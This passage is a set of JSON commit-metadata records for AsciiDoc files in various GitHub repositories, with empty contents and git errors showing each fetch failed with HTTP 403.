apache-camel,NickCis\/camel,Thopap\/camel,drsquidop\/camel,CodeSmell\/camel,scranton\/camel,sirlatrom\/camel,anton-k11\/camel,pkletsko\/camel,RohanHart\/camel,curso007\/camel,akhettar\/camel,akhettar\/camel,pmoerenhout\/camel,jkorab\/camel,nikhilvibhav\/camel,tkopczynski\/camel,tdiesler\/camel,tkopczynski\/camel,Thopap\/camel,isavin\/camel,jamesnetherton\/camel,pkletsko\/camel,salikjan\/camel,scranton\/camel,nicolaferraro\/camel,jarst\/camel,JYBESSON\/camel,w4tson\/camel,NickCis\/camel,nboukhed\/camel,onders86\/camel,gilfernandes\/camel,curso007\/camel,RohanHart\/camel,w4tson\/camel,pkletsko\/camel,NickCis\/camel,pax95\/camel,dmvolod\/camel,kevinearls\/camel,pmoerenhout\/camel,gautric\/camel,cunningt\/camel,nboukhed\/camel,drsquidop\/camel,Thopap\/camel,jonmcewen\/camel,RohanHart\/camel,gautric\/camel,anoordover\/camel,jonmcewen\/camel,gautric\/camel,anton-k11\/camel,gnodet\/camel,veithen\/camel,snurmine\/camel,lburgazzoli\/camel,adessaigne\/camel,lburgazzoli\/camel,christophd\/camel,JYBESSON\/camel,NickCis\/camel,christophd\/camel,jkorab\/camel,tadayosi\/camel,alvinkwekel\/camel,RohanHart\/camel,adessaigne\/camel,jkorab\/camel,salikjan\/camel,dmvolod\/camel,isavin\/camel,punkhorn\/camel-upstream,JYBESSON\/camel,sabre1041\/camel,tdiesler\/camel,Fabryprog\/camel,anton-k11\/camel,mgyongyosi\/camel,nikhilvibhav\/camel,gautric\/camel,pmoerenhout\/camel,chirino\/camel,jonmcewen\/camel,kevinearls\/camel,adessaigne\/camel,curso007\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,gilfernandes\/camel,tadayosi\/camel,ssharma\/camel,gautric\/camel,prashant2402\/camel,davidkarlsen\/camel,isavin\/camel,zregvart\/camel,drsquidop\/camel,pkletsko\/camel,driseley\/camel,jarst\/camel,nboukhed\/camel,veithen\/camel,chirino\/camel,punkhorn\/camel-upstream,tkopczynski\/camel,gnodet\/camel,CodeSmell\/camel,anoordover\/camel,adessaigne\/camel,yuruki\/camel,drsquidop\/camel,lburgazzoli\/camel,DariusX\/camel,neoramon\/camel,Fabryprog\/camel,bhaveshdt\/camel,rmarting\/camel,hqstevenson\/camel,sabre1041\/camel,sirlatrom\/camel,alvinkwekel\/camel,lburgazzoli\/apache-camel,jarst\/camel,NickCis\/camel,mgyongyosi\/camel,gnodet\/camel,bhaveshdt\/camel,mgyongyosi\/camel,veithen\/camel,christophd\/camel,JYBESSON\/camel,acartapanis\/camel,chirino\/camel,jonmcewen\/camel,JYBESSON\/camel,ssharma\/camel,jonmcewen\/camel,curso007\/camel,acartapanis\/camel,zregvart\/camel,gilfernandes\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,sabre1041\/camel,bhaveshdt\/camel,lburgazzoli\/apache-camel,mcollovati\/camel,tlehoux\/camel,ssharma\/camel,DariusX\/camel,lburgazzoli\/apache-camel,onders86\/camel,tlehoux\/camel,driseley\/camel,punkhorn\/camel-upstream,ssharma\/camel,ullgren\/camel,pmoerenhout\/camel,christophd\/camel,neoramon\/camel,gilfernandes\/camel,mgyongyosi\/camel,Fabryprog\/camel,chirino\/camel,mcollovati\/camel,snurmine\/camel,tlehoux\/camel,driseley\/camel,prashant2402\/camel,tadayosi\/camel,apache\/camel,veithen\/camel,mcollovati\/camel,onders86\/camel,dmvolod\/camel,w4tson\/camel,nikhilvibhav\/camel,scranton\/camel,akhettar\/camel,christophd\/camel,acartapanis\/camel,bgaudaen\/camel,rmarting\/camel,snurmine\/camel","old_file":"components\/camel-xstream\/src\/main\/docs\/json-xstream-dataformat.adoc","new_file":"components\/camel-xstream\/src\/main\/docs\/json-xstream-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"0ae03b4da01f05f78ba96816fb4ea23f5e2f7f65","subject":"clean up","message":"clean up\n","repos":"lookout\/clouddriver,lookout\/clouddriver,ajordens\/clouddriver,lookout\/clouddriver,ajordens\/clouddriver,cfieber\/clouddriver,cfieber\/clouddriver,spinnaker\/clouddriver,ajordens\/clouddriver,spinnaker\/clouddriver,duftler\/clouddriver,danveloper\/clouddriver,stitchfix\/clouddriver,stitchfix\/clouddriver,duftler\/clouddriver,duftler\/clouddriver,spinnaker\/clouddriver,cfieber\/clouddriver,lookout\/clouddriver,ajordens\/clouddriver,danveloper\/clouddriver,danveloper\/clouddriver,duftler\/clouddriver","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spinnaker\/clouddriver.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"c73140b006d71cec1ffac4cfb2601a441262484e","subject":"add missing test fixture","message":"add missing test fixture\n","repos":"dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf","old_file":"spec\/fixtures\/reference-to-sibling.adoc","new_file":"spec\/fixtures\/reference-to-sibling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Hextremist\/asciidoctor-pdf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ea65e964902b4392ed8e523fd3ea47599755b1ce","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"916f0cf58ef2b009edc42e6c76aecddc91b5b0ab","subject":"Update 2015-07-10-How-to-deploy-the-fabric8-console-on-docker.adoc","message":"Update 2015-07-10-How-to-deploy-the-fabric8-console-on-docker.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-07-10-How-to-deploy-the-fabric8-console-on-docker.adoc","new_file":"_posts\/2015-07-10-How-to-deploy-the-fabric8-console-on-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"4b49978c199125ddbb4a6101f08ba7ea698cf405","subject":"Update 2017-06-09-Disable-Shared-Experiences-in-Windows-10-v1703.adoc","message":"Update 2017-06-09-Disable-Shared-Experiences-in-Windows-10-v1703.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2017-06-09-Disable-Shared-Experiences-in-Windows-10-v1703.adoc","new_file":"_posts\/2017-06-09-Disable-Shared-Experiences-in-Windows-10-v1703.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"04580c8a83bb87a68775576177869980a3dfa8f0","subject":"some minor bugfixes for release plugin","message":"some minor bugfixes for release plugin\n","repos":"moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan","old_file":"leguan-server\/src\/main\/docs\/configureActions.adoc","new_file":"leguan-server\/src\/main\/docs\/configureActions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moley\/leguan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"24ce3ecb43f1668bebda374d45786ed38492d67d","subject":"Fix typo in docs","message":"Fix typo in docs\n","repos":"ptahchiev\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,bclozel\/spring-boot,bclozel\/spring-boot,drumonii\/spring-boot,vpavic\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,rweisleder\/spring-boot,spring-projects\/spring-boot,NetoDevel\/spring-boot,lburgazzoli\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,htynkn\/spring-boot,htynkn\/spring-boot,spring-projects\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,felipeg48\/spring-boot,bclozel\/spring-boot,ptahchiev\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,rweisleder\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,vpavic\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,zhanhb\/spring-boot,royclarkson\/spring-boot,yangdd1205\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,wilkinsona\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,shakuzen\/spring-boot,dreis2211\/spring-boot,Buzzardo\/spring-boot,lburgazzoli\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot,shakuzen\/spring-boot,drumonii\/spring-boot,chrylis\/spring-boot,lburgazzoli\/spring-boot,rweisleder\/spring-boot,eddumelendez\/spring-boot,jxblum\/spring-boot,ptahchiev\/spring-boot,rweisleder\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,lburgazzoli\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,donhuvy\/spring-boot,bclozel\/spring-boot,tsachev\/spring-boot,shakuzen\/spring-boot,donhuvy\/spring-boot,ilayaperumalg\/spring-boot,ilayaperumalg\/spring-boot,hello2009chen\/spring-boot,royclarkson\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,michael-simons\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,felipeg48\/spring-boot,spring-projects\/spring-boot,hello2009chen\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,joshiste\/spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,dreis2211\/spring-boot,donhuvy\/spring-boot,shakuzen\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,mbenson\/spring-boot,aahlenst\/spring-boot,Buzzardo\/spring-boot,rweisleder\/spring-boot,bclozel\/spring-boot,yangdd1205\/spring-boot,wilkinsona\/spring-boot,tsachev\/spring-boot,htynkn\/spring-boot,NetoDevel\/spring-boot,kdvolder\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,tsachev\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,vpavic\/spring-boot,philwebb\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lburgazzoli\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"9659837d0b64dff4f63012d440c7daa028dc0a30","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/dance_as_a_metaphor_of_life.adoc","new_file":"content\/writings\/dance_as_a_metaphor_of_life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"010f80cd37dcc834228b420149e19eb811dcd4ce","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"af810327af18b68eb00ea15ae661840b47508a3d","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"472bf968c20487ccda35f2ec26591fa8dab3ce50","subject":"Add note","message":"Add note\n","repos":"lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint","old_file":"doc-bridgepoint\/notes\/eclipse-2020-06\/eclipse-2020-06.int.adoc","new_file":"doc-bridgepoint\/notes\/eclipse-2020-06\/eclipse-2020-06.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"b3b631d4bc766be6ab6b3f6ad5d6450e3a2c3ce6","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-common","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"a7634947476b14a22f412339d8144229999e4ace","subject":"Added a contribution document.","message":"Added a contribution document.\n\nThis document defines how contributions can be made to this project.\n","repos":"jsr377\/jsr377-api","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsr377\/jsr377-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"3e9c91f8c948eac80f8ae112e2024a8ecb1374a5","subject":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","message":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7390d3b9b68e111dbbbf08cf4fbb5060073732ba","subject":"Create README.adoc","message":"Create README.adoc","repos":"nmcl\/golang","old_file":"example\/src\/olleh\/README.adoc","new_file":"example\/src\/olleh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmcl\/golang.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"a133f04067a2b8c4fa1ff5610119b5e44f0aa246","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6dfd4465ffac5a61a6ba54d2acb5fd550547176d","subject":"Update 2017-06-26-vimmer1.adoc","message":"Update 2017-06-26-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-26-vimmer1.adoc","new_file":"_posts\/2017-06-26-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7d9f54a4b21888b084cac944f5b806bfe3901cc8","subject":"Add blog post about new features in Undertow.js","message":"Add blog post about new features in Undertow.js\n","repos":"rhusar\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org","old_file":"news\/2015-11-02-Undertow.js-1.0.1.Final.adoc","new_file":"news\/2015-11-02-Undertow.js-1.0.1.Final.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"8386177bfd41586fdab6fb4b02644c299a791723","subject":"Clarify manual page even more","message":"Clarify manual page even more\n","repos":"lassik\/extract,lassik\/extract","old_file":"extract.1.adoc","new_file":"extract.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"}
{"commit":"b6a7ee076d38a7f552eaae75e18ee38f2b1a33cb","subject":"y2b create post These Tiny Earbuds Raised $2.7 Million Dollars...","message":"y2b create post These Tiny Earbuds Raised $2.7 Million Dollars...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-21-These-Tiny-Earbuds-Raised-27-Million-Dollars.adoc","new_file":"_posts\/2017-07-21-These-Tiny-Earbuds-Raised-27-Million-Dollars.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"714595cf1267e8eb1f36533b025fa8da94d8f18a","subject":"Create MacOSX.adoc","message":"Create MacOSX.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/installation\/MacOSX.adoc","new_file":"wiki\/installation\/MacOSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7cc13b97c6158c62a5aad32fbc5d8586a0056882","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"eb392587193226ae3872ecefd5752dbd06122aab","subject":"Update 2016-10-07-Pepper-With-Userlocal-A-I.adoc","message":"Update 2016-10-07-Pepper-With-Userlocal-A-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-07-Pepper-With-Userlocal-A-I.adoc","new_file":"_posts\/2016-10-07-Pepper-With-Userlocal-A-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b0b4fbd61e01ef41611fb7f4666cbe556aa8d179","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1f6b3896ce31deae47431d3031544ab7802b163f","subject":"y2b create post Fully Wireless Earbuds - Do They Still Suck?","message":"y2b create post Fully Wireless Earbuds - Do They Still Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-14-Fully-Wireless-Earbuds--Do-They-Still-Suck.adoc","new_file":"_posts\/2016-08-14-Fully-Wireless-Earbuds--Do-They-Still-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"31010cde374df1f1d50c1c3cc0c047e5f5b66a82","subject":"y2b create post What If Your Backpack Did All The Charging?","message":"y2b create post What If Your Backpack Did All The Charging?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-21-What-If-Your-Backpack-Did-All-The-Charging.adoc","new_file":"_posts\/2016-08-21-What-If-Your-Backpack-Did-All-The-Charging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"38f4721f9fb2c919d95388d33092cbaef3cdbe79","subject":"job: #10267 Draft persistence preso as input for xtUML Days 2021.","message":"job: #10267 Draft persistence preso as input for xtUML Days 2021.\n","repos":"leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,xtuml\/mc,lwriemen\/mc,leviathan747\/mc,cortlandstarrett\/mc,xtuml\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc","old_file":"doc\/notes\/10267_persist\/10267_persist_preso_ant.adoc","new_file":"doc\/notes\/10267_persist\/10267_persist_preso_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"6c6f1e3782494f810ba05df73f0ca5c635cf68f8","subject":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","message":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"721c6dc3f93141577500b8ed76dc42db3db668cd","subject":"Update 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Update 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"_posts\/2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
